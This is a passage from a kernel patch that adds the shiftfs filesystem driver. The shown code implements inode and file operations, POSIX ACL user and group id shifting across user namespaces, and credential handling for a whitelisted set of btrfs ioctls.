++	inode = NULL;
++
++out_iput:
++	iput(inode);
++	inode_unlock(loweri_dir);
++
++	return err;
++}
++
++static int shiftfs_create(struct user_namespace *ns,
++			  struct inode *dir, struct dentry *dentry,
++			  umode_t mode,  bool excl)
++{
++	mode |= S_IFREG;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
++}
++
++static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
++			 umode_t mode)
++{
++	mode |= S_IFDIR;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
++			struct dentry *dentry)
++{
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_mknod(struct user_namespace *ns,
++			 struct inode *dir, struct dentry *dentry, umode_t mode,
++			 dev_t rdev)
++{
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
++		return -EPERM;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
++			   const char *symlink)
++{
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++}
++
++static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
++	int err;
++	const struct cred *oldcred;
++
++	dget(lowerd);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	inode_lock_nested(loweri, I_MUTEX_PARENT);
++	if (rmdir)
++		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
++	else
++		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
++	revert_creds(oldcred);
++
++	if (!err) {
++		d_drop(dentry);
++
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
++
++	return err;
++}
++
++static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, false);
++}
++
++static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, true);
++}
++
++static int shiftfs_rename(struct user_namespace *ns,
++			  struct inode *olddir, struct dentry *old,
++			  struct inode *newdir, struct dentry *new,
++			  unsigned int flags)
++{
++	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
++		      *lowerd_dir_new = new->d_parent->d_fsdata,
++		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
++		      *trapd;
++	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
++		     *loweri_dir_new = lowerd_dir_new->d_inode;
++	struct renamedata rd = {
++		.old_mnt_userns	= &init_user_ns,
++		.old_dir	= loweri_dir_old,
++		.old_dentry	= lowerd_old,
++		.new_mnt_userns	= &init_user_ns,
++		.new_dir	= loweri_dir_new,
++		.new_dentry	= lowerd_new,
++	};
++	int err = -EINVAL;
++	const struct cred *oldcred;
++
++	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
++
++	if (trapd == lowerd_old || trapd == lowerd_new)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(old->d_sb);
++	err = vfs_rename(&rd);
++	revert_creds(oldcred);
++
++	shiftfs_copyattr(loweri_dir_old, olddir);
++	shiftfs_copyattr(loweri_dir_new, newdir);
++
++out_unlock:
++	unlock_rename(lowerd_dir_new, lowerd_dir_old);
++
++	return err;
++}
++
++static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
++				     unsigned int flags)
++{
++	struct dentry *new;
++	struct inode *newi;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_parent->d_fsdata;
++	struct inode *inode = NULL, *loweri = lowerd->d_inode;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
++
++	if (IS_ERR(new))
++		return new;
++
++	dentry->d_fsdata = new;
++
++	newi = new->d_inode;
++	if (!newi)
++		goto out;
++
++	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
++			     shiftfs_inode_test, shiftfs_inode_set, newi);
++	if (!inode) {
++		dput(new);
++		return ERR_PTR(-ENOMEM);
++	}
++	if (inode->i_state & I_NEW) {
++		/*
++		 * inode->i_private set by shiftfs_inode_set(), but we still
++		 * need to take a reference
++		 */
++		ihold(newi);
++		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
++		unlock_new_inode(inode);
++	}
++
++out:
++	return d_splice_alias(inode, dentry);
++}
++
++static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri) {
++		WARN_ON(!(mask & MAY_NOT_BLOCK));
++		return -ECHILD;
++	}
++
++	err = generic_permission(&init_user_ns, inode, mask);
++	if (err)
++		return err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = inode_permission(&init_user_ns, loweri, mask);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_fiemap(struct inode *inode,
++			  struct fiemap_extent_info *fieinfo, u64 start,
++			  u64 len)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri->i_op->fiemap)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
++		filemap_write_and_wait(loweri->i_mapping);
++	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_tmpfile(struct user_namespace *ns,
++			   struct inode *dir, struct file *file,
++			   umode_t mode)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = dir->i_private;
++
++	if (!loweri->i_op->tmpfile)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(dir->i_sb);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
++{
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct iattr newattr;
++	const struct cred *oldcred;
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	int err;
++
++	err = setattr_prepare(&init_user_ns, dentry, attr);
++	if (err)
++		return err;
++
++	newattr = *attr;
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
++
++	/*
++	 * mode change is for clearing setuid/setgid bits. Allow lower fs
++	 * to interpret this in its own way.
++	 */
++	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		newattr.ia_valid &= ~ATTR_MODE;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, d_inode(dentry));
++
++	return err;
++}
++
++static int shiftfs_getattr(struct user_namespace *ns,
++			   const struct path *path, struct kstat *stat,
++			   u32 request_mask, unsigned int query_flags)
++{
++	struct inode *inode = path->dentry->d_inode;
++	struct dentry *lowerd = path->dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
++	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	const struct cred *oldcred;
++	int err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
++	revert_creds(oldcred);
++
++	if (err)
++		return err;
++
++	/* transform the underlying id */
++	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
++	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
++	return 0;
++}
++
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++
++static int
++shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
++	      struct posix_acl *acl)
++{
++	int i;
++
++	for (i = 0; i < acl->a_count; i++) {
++		struct posix_acl_entry *e = &acl->a_entries[i];
++		switch(e->e_tag) {
++		case ACL_USER:
++			e->e_uid = shift_kuid(from, to, e->e_uid);
++			if (!uid_valid(e->e_uid))
++				return -EOVERFLOW;
++			break;
++		case ACL_GROUP:
++			e->e_gid = shift_kgid(from, to, e->e_gid);
++			if (!gid_valid(e->e_gid))
++				return -EOVERFLOW;
++			break;
++		}
++	}
++	return 0;
++}
++
++static void
++shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
++		    void *value, size_t size)
++{
++	struct posix_acl_xattr_header *header = value;
++	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
++	int count;
++	kuid_t kuid;
++	kgid_t kgid;
++
++	if (!value)
++		return;
++	if (size < sizeof(struct posix_acl_xattr_header))
++		return;
++	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
++		return;
++
++	count = posix_acl_xattr_count(size);
++	if (count < 0)
++		return;
++	if (count == 0)
++		return;
++
++	for (end = entry + count; entry != end; entry++) {
++		switch(le16_to_cpu(entry->e_tag)) {
++		case ACL_USER:
++			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kuid = shift_kuid(from, to, kuid);
++			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
++			break;
++		case ACL_GROUP:
++			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
++			kgid = shift_kgid(from, to, kgid);
++			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
++			break;
++		default:
++			break;
++		}
++	}
++}
++
++static struct posix_acl *
++shiftfs_get_acl(struct inode *inode, int type, bool rcu)
++{
++	struct inode *loweri = inode->i_private;
++	const struct cred *oldcred;
++	struct posix_acl *lower_acl, *acl = NULL;
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	int size;
++	int err;
++
++	if (rcu)
++		return ERR_PTR(-ECHILD);
++
++	if (!IS_POSIXACL(loweri))
++		return NULL;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	lower_acl = get_acl(loweri, type);
++	revert_creds(oldcred);
++
++	if (lower_acl && !IS_ERR(lower_acl)) {
++		/* XXX: export posix_acl_clone? */
++		size = sizeof(struct posix_acl) +
++		       lower_acl->a_count * sizeof(struct posix_acl_entry);
++		acl = kmemdup(lower_acl, size, GFP_KERNEL);
++		posix_acl_release(lower_acl);
++
++		if (!acl)
++			return ERR_PTR(-ENOMEM);
++
++		refcount_set(&acl->a_refcount, 1);
++
++		err = shift_acl_ids(from_ns, to_ns, acl);
++		if (err) {
++			kfree(acl);
++			return ERR_PTR(err);
++		}
++	}
++
++	return acl;
++}
++
++static int
++shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
++			   struct dentry *dentry, struct inode *inode,
++			   const char *name, void *buffer, size_t size)
++{
++	struct inode *loweri = inode->i_private;
++	int ret;
++
++	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
++				buffer, size);
++	if (ret < 0)
++		return ret;
++
++	inode_lock(loweri);
++	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
++			    buffer, size);
++	inode_unlock(loweri);
++	return ret;
++}
++
++static int
++shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct user_namespace *ns,
++			    struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct inode *loweri = inode->i_private;
++	int err;
++
++	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
++		return -EOPNOTSUPP;
++	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
++		return value ? -EACCES : 0;
++	if (!inode_owner_or_capable(&init_user_ns, inode))
++		return -EPERM;
++
++	if (value) {
++		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
++				    loweri->i_sb->s_user_ns,
++				    (void *)value, size);
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++				       size, flags);
++	} else {
++		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
++	}
++
++	if (!err)
++		shiftfs_copyattr(loweri, inode);
++
++	return err;
++}
++
++static const struct xattr_handler
++shiftfs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = ACL_TYPE_ACCESS,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
++};
++
++static const struct xattr_handler
++shiftfs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = ACL_TYPE_DEFAULT,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
++};
++
++#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
++
++#define shiftfs_get_acl NULL
++
++#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
++
++static const struct inode_operations shiftfs_dir_inode_operations = {
++	.lookup		= shiftfs_lookup,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.setattr	= shiftfs_setattr,
++	.create		= shiftfs_create,
++	.mknod		= shiftfs_mknod,
++	.permission	= shiftfs_permission,
++	.getattr	= shiftfs_getattr,
++	.listxattr	= shiftfs_listxattr,
++	.get_acl	= shiftfs_get_acl,
++};
++
++static const struct inode_operations shiftfs_file_inode_operations = {
++	.fiemap		= shiftfs_fiemap,
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++	.tmpfile	= shiftfs_tmpfile,
++};
++
++static const struct inode_operations shiftfs_special_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++};
++
++static const struct inode_operations shiftfs_symlink_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_link	= shiftfs_get_link,
++	.listxattr	= shiftfs_listxattr,
++	.setattr	= shiftfs_setattr,
++};
++
++static struct file *shiftfs_open_realfile(const struct file *file,
++					  struct inode *realinode)
++{
++	struct file *realfile;
++	const struct cred *old_cred;
++	struct inode *inode = file_inode(file);
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	old_cred = shiftfs_override_creds(inode->i_sb);
++	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
++				       info->creator_cred);
++	revert_creds(old_cred);
++
++	return realfile;
++}
++
++#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
++
++static int shiftfs_change_flags(struct file *file, unsigned int flags)
++{
++	struct inode *inode = file_inode(file);
++	int err;
++
++	/* if some flag changed that cannot be changed then something's amiss */
++	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
++		return -EIO;
++
++	flags &= SHIFTFS_SETFL_MASK;
++
++	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
++		return -EPERM;
++
++	if (flags & O_DIRECT) {
++		if (!file->f_mapping->a_ops ||
++		    !file->f_mapping->a_ops->direct_IO)
++			return -EINVAL;
++	}
++
++	if (file->f_op->check_flags) {
++		err = file->f_op->check_flags(flags);
++		if (err)
++			return err;
++	}
++
++	spin_lock(&file->f_lock);
++	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
++	spin_unlock(&file->f_lock);
++
++	return 0;
++}
++
++static int shiftfs_open(struct inode *inode, struct file *file)
++{
++	struct file *realfile;
++
++	realfile = shiftfs_open_realfile(file, inode->i_private);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
++
++	file->private_data = realfile;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
++	return 0;
++}
++
++static int shiftfs_dir_open(struct inode *inode, struct file *file)
++{
++	struct file *realfile;
++	const struct cred *oldcred;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
++			       info->creator_cred);
++	revert_creds(oldcred);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
++
++	file->private_data = realfile;
++
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct file *realfile = file->private_data;
++
++	if (realfile)
++		fput(realfile);
++
++	return 0;
++}
++
++static int shiftfs_dir_release(struct inode *inode, struct file *file)
++{
++	return shiftfs_release(inode, file);
++}
++
++static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct file *realfile = file->private_data;
++
++	return vfs_llseek(realfile, offset, whence);
++}
++
++static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct inode *realinode = file_inode(file)->i_private;
++
++	return generic_file_llseek_size(file, offset, whence,
++					realinode->i_sb->s_maxbytes,
++					i_size_read(realinode));
++}
++
++/* XXX: Need to figure out what to do about atime updates, maybe other
++ * timestamps too ... ref. ovl_file_accessed() */
++
++static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
++{
++	int ifl = iocb->ki_flags;
++	rwf_t flags = 0;
++
++	if (ifl & IOCB_NOWAIT)
++		flags |= RWF_NOWAIT;
++	if (ifl & IOCB_HIPRI)
++		flags |= RWF_HIPRI;
++	if (ifl & IOCB_DSYNC)
++		flags |= RWF_DSYNC;
++	if (ifl & IOCB_SYNC)
++		flags |= RWF_SYNC;
++
++	return flags;
++}
++
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open &&
++	    file->f_op->open != shiftfs_dir_open)
++		return -EINVAL;
++
++	realfile = file->private_data;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
++static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
++			    shiftfs_iocb_to_rwf(iocb));
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	inode_lock(inode);
++	/* Update mode */
++	shiftfs_copyattr(inode->i_private, inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	file_start_write(lowerfd.file);
++	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
++			     shiftfs_iocb_to_rwf(iocb));
++	file_end_write(lowerfd.file);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(inode->i_private, inode);
++
++	fdput(lowerfd);
++
++out_unlock:
++	inode_unlock(inode);
++	return ret;
++}
++
++static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
++			 int datasync)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct file *realfile = file->private_data;
++	const struct cred *oldcred;
++	int ret;
++
++	if (!realfile->f_op->mmap)
++		return -ENODEV;
++
++	if (WARN_ON(file != vma->vm_file))
++		return -EIO;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	vma->vm_file = get_file(realfile);
++	ret = call_mmap(vma->vm_file, vma);
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
++
++	return ret;
++}
++
++static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
++			      loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = inode->i_private;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
++			   int advice)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
++					const struct cred **oldcred,
++					struct cred **newcred)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
++
++	/* clear all caps to prevent bypassing capable() checks */
++	cap_clear((*newcred)->cap_bset);
++	cap_clear((*newcred)->cap_effective);
++	cap_clear((*newcred)->cap_inheritable);
++	cap_clear((*newcred)->cap_permitted);
++
++	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
++		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
++		/*
++		 * Allow the root user in the container to remove subvolumes
++		 * from other users.
++		 */
++		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
++			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
++	}
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
++					      struct cred *newcred)
++{
++	return shiftfs_revert_object_creds(oldcred, newcred);
++}
++
++static inline bool is_btrfs_snap_ioctl(int cmd)
++{
++	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
++		return true;
++
++	return false;
++}
++
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
++					  struct btrfs_ioctl_vol_args *v1,
++					  struct btrfs_ioctl_vol_args_v2 *v2)
++{
++	int ret;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE)
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++	else
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++
++	close_fd(fd);
++	kfree(v1);
++	kfree(v2);
++
++	return ret ? -EFAULT : 0;
++}
++
++static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
++					  struct btrfs_ioctl_vol_args **b1,
++					  struct btrfs_ioctl_vol_args_v2 **b2,
++					  int *newfd)
++{
++	int oldfd, ret;
++	struct fd src;
++	struct fd lfd = {};
++	struct btrfs_ioctl_vol_args *v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
++
++	*b1 = NULL;
++	*b2 = NULL;
++
++	if (!is_btrfs_snap_ioctl(cmd))
++		return 0;
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1 = memdup_user(arg, sizeof(*v1));
++		if (IS_ERR(v1))
++			return PTR_ERR(v1);
++		oldfd = v1->fd;
++	} else {
++		v2 = memdup_user(arg, sizeof(*v2));
++		if (IS_ERR(v2))
++			return PTR_ERR(v2);
++		oldfd = v2->fd;
++	}
++
++	src = fdget(oldfd);
++	if (!src.file) {
++		ret = -EINVAL;
++		goto err_free;
++	}
++
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
++		goto err_free;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
++
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
++	if (*newfd < 0) {
++		fdput(lfd);
++		ret = *newfd;
++		goto err_free;
++	}
++
++	fd_install(*newfd, lfd.file);
++
++	if (cmd == BTRFS_IOC_SNAP_CREATE) {
++		v1->fd = *newfd;
++		ret = copy_to_user(arg, v1, sizeof(*v1));
++		v1->fd = oldfd;
++	} else {
++		v2->fd = *newfd;
++		ret = copy_to_user(arg, v2, sizeof(*v2));
++		v2->fd = oldfd;
++	}
++
++	if (!ret) {
++		*b1 = v1;
++		*b2 = v2;
++	} else {
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++		ret = -EFAULT;
++	}
++
++	return ret;
++
++err_free:
++	kfree(v1);
++	kfree(v2);
++
++	return ret;
++}
++
++static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	struct fd lowerfd;
++	struct cred *newcred;
++	const struct cred *oldcred;
++	int newfd = -EBADF;
++	long err = 0, ret = 0;
++	void __user *argp = (void __user *)arg;
++	struct super_block *sb = file->f_path.dentry->d_sb;
++	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
++	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
++
++	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
++					     &newfd);
++	if (ret < 0)
++		return ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_restore;
++
++	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
++	if (ret)
++		goto out_fdput;
++
++	ret = vfs_ioctl(lowerfd.file, cmd, arg);
++
++	shiftfs_revert_ioctl_creds(oldcred, newcred);
++
++	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
++	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
++
++out_fdput:
++	fdput(lowerfd);
++
++out_restore:
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
++					     btrfs_v1, btrfs_v2);
++	if (!ret)
++		ret = err;
++
++	return ret;
++}
++
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
++{
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
++	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE:
++		return true;
++	case BTRFS_IOC_SNAP_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE:
++		return true;
++	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, argp, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
++		return true;
++	case BTRFS_IOC_SNAP_DESTROY:
++		return true;
++	}
++
